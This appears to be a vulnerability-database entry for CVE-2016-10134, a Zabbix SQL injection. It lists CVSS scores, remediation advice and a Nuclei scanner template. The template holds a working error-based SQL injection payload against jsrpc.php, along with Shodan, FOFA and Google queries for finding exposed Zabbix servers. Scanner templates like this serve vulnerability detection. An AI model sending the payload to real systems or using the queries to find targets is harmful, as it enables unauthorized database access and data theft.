Lucene search

ProjectDiscoveryNUCLEI:CVE-2016-10134

HistoryJan 04, 2022 - 10:21 a.m.

Zabbix - SQL Injection

2022-01-0410:21:37

ProjectDiscovery

github.com

zabbix

sql injection

cve-2016-10134

remote attackers

arbitrary sql commands

unauthorized access

data leakage

security patches

upgrade

vulnerability

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.045

Percentile

92.5%

JSON

Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.

id: CVE-2016-10134

info:
  name: Zabbix - SQL Injection
  author: princechaddha
  severity: critical
  description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134).
  reference:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
    - https://support.zabbix.com/browse/ZBX-11023
    - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
    - http://www.debian.org/security/2017/dsa-3802
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-10134
    cwe-id: CWE-89
    epss-score: 0.05366
    epss-percentile: 0.92931
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve2016,cve,zabbix,sqli,vulhub

http:
  - method: GET
    path:
      - "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Error in query [INSERT INTO profiles (profileid, userid'
          - 'You have an error in your SQL syntax'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022018a825747d78818fdb7ced045c8435e2c292a9e2c97b314289f989ec9b75c6f402202ccf2131d2cdb4eb4fba454e3c56c741f459f3545b3290c9e896aa9eeb47bf4f:922c64590222798bb761d5b6d8e72950